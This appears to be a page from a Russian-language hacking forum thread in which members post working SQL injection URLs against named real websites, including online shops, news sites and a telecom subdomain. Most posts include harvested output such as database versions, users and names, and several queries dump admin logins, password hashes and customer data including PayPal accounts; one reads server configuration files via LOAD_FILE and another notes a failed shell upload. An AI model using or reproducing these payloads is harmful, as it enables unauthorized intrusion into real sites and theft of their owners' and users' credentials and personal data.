SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://krossovki.biz/index.php?mod_name=products&id=14+and+1=0+UnIon+selECt+1,concat_ws(0x3a,id,login,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+krossovki_admin_users--+
    ТИЦ: 10

    http://www.tennis-stock.com/catalog.htm?id=832+and+1=0+union+select+1,2,3,4,5,6,7,8--

    ТИЦ: 10
     
    #13081 tracy, 24 Sep 2010
    Last edited: 24 Sep 2010
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Шелл не залил =(

    http://search.aladon.org.ua/history.php?id=-186+UNION+SELECT+1,2,3,4,5,6,7,8,concat(0x3C746578746172656120636F6C733D2238302220726F77733D223330223E,LOAD_FILE(0x2F6574632F617061636865322F73697465732D617661696C61626C652F64656661756C74),0x3C2F74657874617265613E),10,11,12,13,14,15--
     
    #13082 b3, 24 Sep 2010
    Last edited by a moderator: 24 Sep 2010
  3. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    http://www.ultimatumz.com/product.php?id=-20+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--+
    5.1.26-rc-5.1.26rc:db93410_UltimatumZ:[email protected]

    Тиц : 10
     
  4. DarkDante

    DarkDante Banned

    Joined:
    24 Dec 2004
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    PHP:
    http://www.slightergolf.com/products/shop.php?id=-18+union+select+ 1,2,3,4,version(), 6,7,8,9,10,11--
    5.1.47-community-log
     
  5. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.virgolds.com/buy/index.php?id=1'+and+1=0+UnIon+selECt+1,2,concat_ws(0x3a,id,username,userpass,sal,firstname,lastname,paypalaccount,userim,usertel,interestgame,signup_url,signuptime,introducerid,usertype,usertotal),4,5,6,7,8,9,10,11,12,13,14,15,16+from+virgoods_member+limit+51,1--+
    Если будете брутить хеши формат md5(md5($pass).$salt)
    PR: 3
     
  6. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://www.nealcorealestate.com/sell.php?s=-7+union+select+1,version%28%29,3,4,5--

    http://www.floso.org/onlineshop.php?id=-15+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24--

    http://www.skepticon.org/shop/item.php?id=-3+union+select+1,2,version%28%29,4,5,6--

    http://www.e-globalshopping.com/shop/item.php?id=5059%20union%20select%201,2,3,4,5,6,7,

    http://www.francescakaplan.com/shop/item.php?id=-6+union+select+1,version%28%29,3,4,5,6,7,8--
     
    5 people like this.
  7. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.cskabasket.com/news/?a=junior&id=8881+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))

    XSS присутсвует,в теме "хсс" выкладывали уже )
    ТИЦ : 700 PR: 6
     
    1 person likes this.
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.vaxjap.com/cat1.php?c1=2+union+select+cast(version()||chr(58)||user as int),null,null,null,null,null,null,null,null+from+pg_user;--

    Code:
    [COLOR=Yellow]PostgreSQL 8.1.21 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-48):3241a5781cc95c12082c129344937356[/COLOR]
     
    _________________________
    1 person likes this.
  9. skM

    skM New Member

    Joined:
    27 Jun 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Сеть салонов модных часов
     
  10. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    http://www.matagordabaylanzarote.com/lanzarote-news.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
     
  11. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://www.gotkosherinc.com/shop/menu.php?id=-18+union+select+1,2,3,count%28*%29,5,6,7,8,9,10,11 ,12+from+dc_orderhead--

    шоп картон
     
    1 person likes this.
  12. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.moscowatch.ru/clock_window.php?id=2827+and+1=0+union+select+1,version(),3+--+
    4-mysql
    ТИЦ : 50 PR: 5


    http://www.metaprom.ru/firms-info/?company_id=1369+and+1=0+union+select+1,group_concat(schema_name)+from+information_schema.schemata+--+
    ТИЦ : 2300 траффа - немалая пузомерка )))
     
  13. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.banglasports.com/football-old/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,
     
  14. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    МТС :D

    Code:
    http://mts05.ru/numbers_open.php?id=-2666+union+select+1,concat(0x3a,pass,login),3,4,5+from+mts_admins--
     
    1 person likes this.
  15. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    СамараТур

    http://www.samaratour.com/cgi-bin/new/st.cgi?act=sp;C=01;l=r;ID=-569387325+and+1=2+union+select+1,2,3,4,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--

    version : 5.1.41-log
    user : [email protected]
    database : samaratour_satr
    os : portbld-freebsd7.2
     
  16. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.opinionytoros.com/manoamano.php?Id=238 and 1=0 UNION SELECT 1,2,3,4,5,6,concat(version(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+
     
    1 person likes this.
  17. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    http://www.cfmoto.cn/Product.php?id=2+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x3a,version(),database(),user())),1,64),floor(rand(0)*2)))

    5.0.51b-community-nt:chunfeng_weben:root@localhost1
    PR: 3
     
    2 people like this.
  18. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    БАЛТИКА-ТРАНС

    http://baltica-trans.ru/index.php5?articleId=-5+and+1=2+union+select+1,concat(@@version,0x0a,user(),0x0a,database(),0x0a,@@version_compile_os),3+--

    version : 5.1.46-log
    user : baltica-trans@localhost
    database : baltica_trans_rus
    os : portbld-freebsd7.2
     
  19. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.bec.bn.by/news.php?action=detail&id=-3+union+select+group_concat(0x0b,table_name),2,3,4+from+information_schema.tables--


    http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,group_concat(0x0b,table_name),3,4,5,6,7+from+information_schema.tables--


    http://auto-elita.od.ua/news.php?act=news&id=-3+union+select+1,2,3,group_concat(0x0b,id,0x3a,user,0x3a,pass),5,6+from+userlist--

    http://www.injacksonmemory.com/ru/news.php?ID=-3+union+select+1,2,3,group_concat(0x0b,user_name,0x3a,pass),5+from+users-- <-- забавный сайт
     
    #13099 Bramin, 25 Sep 2010
    Last edited: 25 Sep 2010
  20. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.lawyercom.ru/favreader.htm?id=1243+and+1=0+UnIon+selECt+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=0x75736572+--+

    ТИЦ : 250 PR: 5
     
Thread Status:
Not open for further replies.